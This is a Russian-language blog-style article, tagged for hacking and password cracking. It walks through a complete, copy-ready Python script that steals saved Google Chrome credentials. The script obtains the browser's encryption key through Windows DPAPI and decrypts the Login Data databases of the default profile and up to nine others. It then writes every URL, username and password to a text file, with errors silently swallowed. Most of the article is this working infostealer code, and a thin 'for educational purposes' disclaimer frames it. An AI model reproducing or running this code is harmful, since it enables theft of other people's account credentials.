Введение:
Google Chrome - один из самых популярных веб-браузеров, который предоставляет возможность сохранять пароли пользователей для автоматической авторизации на различных веб-сайтах. Однако иногда возникает необходимость получить доступ к этим паролям в целях восстановления данных или анализа. В этой статье мы разберем скрипт на языке Python, который позволяет расшифровывать и извлекать пароли из базы данных Google Chrome.
Дисклеймер.
Вся информация в этой статье носит исключительно познавательный характер. Автор статьи не несет ответственности за ваши действия.
Код полностью будет опубликован в конце статьи
----------------------------------------------------------------------------------------
Импорт необходимых библиотек:
os: библиотека для работы с операционной системой.
json: библиотека для работы с JSON-файлами.
base64: библиотека для кодирования и декодирования данных в формате Base64.
sqlite3: библиотека для работы с базой данных SQLite.
win32crypt: библиотека для работы с шифрованием и дешифрованием данных в Windows.
Crypto.Cipher: библиотека для работы с шифрованием и дешифрованием данных с использованием алгоритма AES.
shutil: библиотека для работы с файлами и директориями.
datetime: библиотека для работы с датами и временем.
----------------------------------------------------------------------------------------
Функция get_chrome_datetime(chromedate)
:Данная функция преобразует значение даты и времени, используемое в Google Chrome, в объект datetime.datetime.
Значение chromedate представляет собой количество микросекунд с 1 января 1601 года.
----------------------------------------------------------------------------------------
Функция get_encryption_key():
Эта функция получает ключ для расшифровки паролей из файла Local State, который используется Chrome.
Файл Local State содержит информацию о настройках и состоянии браузера Chrome.
В функции осуществляется чтение файла, декодирование ключа из формата Base64 и расшифровка ключа с использованием текущих учетных данных пользователя.
----------------------------------------------------------------------------------------
Функция decrypt_password(password, key):
Данная функция расшифровывает зашифрованный пароль с использованием ключа.
Если пароль не может быть расшифрован с использованием алгоритма AES, то используется метод win32crypt.CryptUnprotectData() для расшифровки пароля.
----------------------------------------------------------------------------------------
#к сожалению я не могу выложить все скриншотами, так как кусок кода слишком большой
def ChromePasswords():
try:
# get the AES key
key = get_encryption_key()
# local sqlite Chrome database path
db_path = os.path.join(os.environ["USERPROFILE"], "AppData", "Local",
"Google", "Chrome", "User Data", "Default", "Login Data")
# copy the file to another location
# as the database will be locked if chrome is currently running
filename = "ChromeData.db"
shutil.copyfile(db_path, filename)
# connect to the database
db = sqlite3.connect(filename)
cursor = db.cursor()
# `logins` table has the data we need
cursor.execute("select origin_url, action_url, username_value, password_value, date_created, date_last_used from logins order by date_created")
# iterate over all rows
for row in cursor.fetchall():
origin_url = row[0]
action_url = row[1]
username = row[2]
password = decrypt_password(row[3], key)
date_created = row[4]
date_last_used = row[5]
location = "Google_Chrome"
if username or password:
op = open(fr"passwords.txt", "a")
logo = "logo"
Razdel = "="*50
op.write(f"{Razdel}\nURL: {action_url}\nUsername: {username}\nPassword: {password}\nLocation: {location}\n")
else:
continue
cursor.close()
db.close()
try:
# try to remove the copied db file
os.remove(filename)
except:
pass
except:
pass
try:
for count in range(1, 10):
try:
# get the AES key
key = get_encryption_key()
# local sqlite Chrome database path
db_path = os.path.join(os.environ["USERPROFILE"], "AppData", "Local",
"Google", "Chrome", "User Data", f"Profile {count}", "Login Data")
# copy the file to another location
# as the database will be locked if chrome is currently running
filename = "ChromeData1.db"
shutil.copyfile(db_path, filename)
# connect to the database
db = sqlite3.connect(filename)
cursor = db.cursor()
# `logins` table has the data we need
cursor.execute("select origin_url, action_url, username_value, password_value, date_created, date_last_used from logins order by date_created")
# iterate over all rows
for row in cursor.fetchall():
action_url = row[1]
username = row[2]
password = decrypt_password(row[3], key)
location = f"Google_Chrome_Profile {count}"
if username or password:
op = open(fr"passwords.txt", "a+")
logo = "logo"
Razdel = "="*50
op.write(f"{Razdel}\nURL: {action_url}\nUsername: {username}\nPassword: {password}\nLocation: {location}\n")
else:
continue
cursor.close()
db.close()
try:
# try to remove the copied db file
os.remove(filename)
except:
pass
except:
pass
except:
pass
Функция ChromePasswords():Эта функция отвечает за основную логику расшифровки и извлечения паролей из базы данных Chrome.
Сначала она получает ключ для расшифровки паролей, вызывая функцию get_encryption_key().
Затем происходит копирование файла базы данных Chrome в другое место, чтобы избежать блокировки базы данных, если Chrome в данный момент запущен.
После этого устанавливается соединение с базой данных и выполняется запрос для получения всех данных о паролях.
Для каждой записи возвращаются URL-адрес, имя пользователя и зашифрованный пароль.
Зашифрованный пароль дешифруется с использованием функции decrypt_password().
Информация о найденных паролях записывается в файл passwords.txt.
Код для копирования
import os
import json
import base64
import sqlite3
import win32crypt
from Crypto.Cipher import AES
import shutil
from datetime import timezone, datetime, timedelta
def get_chrome_datetime(chromedate):
"""Return a `datetime.datetime` object from a chrome format datetime
Since `chromedate` is formatted as the number of microseconds since January, 1601"""
return datetime(1601, 1, 1) + timedelta(microseconds=chromedate)
def get_encryption_key():
local_state_path = os.path.join(os.environ["USERPROFILE"],
"AppData", "Local", "Google", "Chrome",
"User Data", "Local State")
with open(local_state_path, "r", encoding="utf-8") as f:
local_state = f.read()
local_state = json.loads(local_state)
# decode the encryption key from Base64
key = base64.b64decode(local_state["os_crypt"]["encrypted_key"])
# remove DPAPI str
key = key[5:]
# return decrypted key that was originally encrypted
# using a session key derived from current user's logon credentials
# doc: http://timgolden.me.uk/pywin32-docs/win32crypt.html
return win32crypt.CryptUnprotectData(key, None, None, None, 0)[1]
def decrypt_password(password, key):
try:
# get the initialization vector
iv = password[3:15]
password = password[15:]
# generate cipher
cipher = AES.new(key, AES.MODE_GCM, iv)
# decrypt password
return cipher.decrypt(password)[:-16].decode()
except:
try:
return str(win32crypt.CryptUnprotectData(password, None, None, None, 0)[1])
except:
# not supported
return ""
def ChromePasswords():
import datetime
dt_now = datetime.date.today()
import socket
osname = socket.gethostname()
try:
# get the AES key
key = get_encryption_key()
# local sqlite Chrome database path
db_path = os.path.join(os.environ["USERPROFILE"], "AppData", "Local",
"Google", "Chrome", "User Data", "Default", "Login Data")
# copy the file to another location
# as the database will be locked if chrome is currently running
filename = "ChromeData.db"
shutil.copyfile(db_path, filename)
# connect to the database
db = sqlite3.connect(filename)
cursor = db.cursor()
# `logins` table has the data we need
cursor.execute("select origin_url, action_url, username_value, password_value, date_created, date_last_used from logins order by date_created")
# iterate over all rows
for row in cursor.fetchall():
origin_url = row[0]
action_url = row[1]
username = row[2]
password = decrypt_password(row[3], key)
date_created = row[4]
date_last_used = row[5]
location = "Google_Chrome"
if username or password:
op = open(fr"C:\Google_Chrome_debug\passwords.txt", "a")
logo = "logo"
Razdel = "="*50
op.write(f"{Razdel}\nURL: {action_url}\nUsername: {username}\nPassword: {password}\nLocation: {location}\n")
else:
continue
cursor.close()
db.close()
try:
# try to remove the copied db file
os.remove(filename)
except:
pass
except:
pass
try:
for count in range(1, 10):
try:
# get the AES key
key = get_encryption_key()
# local sqlite Chrome database path
db_path = os.path.join(os.environ["USERPROFILE"], "AppData", "Local",
"Google", "Chrome", "User Data", f"Profile {count}", "Login Data")
# copy the file to another location
# as the database will be locked if chrome is currently running
filename = "ChromeData1.db"
shutil.copyfile(db_path, filename)
# connect to the database
db = sqlite3.connect(filename)
cursor = db.cursor()
# `logins` table has the data we need
cursor.execute("select origin_url, action_url, username_value, password_value, date_created, date_last_used from logins order by date_created")
# iterate over all rows
for row in cursor.fetchall():
action_url = row[1]
username = row[2]
password = decrypt_password(row[3], key)
location = f"Google_Chrome_Profile {count}"
if username or password:
op = open(fr"C:\Google_Chrome_debug\passwords.txt", "a+")
logo = "logo"
Razdel = "="*50
op.write(f"{Razdel}\nURL: {action_url}\nUsername: {username}\nPassword: {password}\nLocation: {location}\n")
else:
continue
cursor.close()
db.close()
try:
# try to remove the copied db file
os.remove(filename)
except:
pass
except:
pass
except:
pass
Заключение:
В этой статье мы рассмотрели скрипт на языке Python, который позволяет расшифровывать и извлекать пароли из базы данных Google Chrome. Мы изучили каждую функцию и библиотеку, используемую в скрипте, чтобы обеспечить более подробное понимание процесса расшифровки и извлечения паролей. Этот скрипт может быть полезен для восстановления утерянных паролей или анализа безопасности веб-браузера Chrome.
#hacking #passwords #взлом #python #взломпаролей
